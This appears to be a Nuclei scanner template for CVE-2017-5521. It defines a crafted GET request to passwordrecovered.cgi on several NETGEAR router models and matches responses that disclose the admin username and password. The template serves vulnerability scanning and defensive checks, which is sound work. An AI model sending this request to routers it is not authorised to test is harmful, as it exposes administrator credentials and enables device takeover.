id: CVE-2017-5521
info:
  name: Bypassing Authentication on NETGEAR Routers
  author: princechaddha
  severity: medium
  description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server.
  reference: |
    - https://www.cvedetails.com/cve/CVE-2017-5521/
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
  tags: cve,cve2017,auth-bypass

requests:
  - method: GET
    path:
      - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "right\">Router\\s*Admin\\s*Username<"
          - "right\">Router\\s*Admin\\s*Password<"
        condition: and
        part: body
      - type: status
        status:
          - 200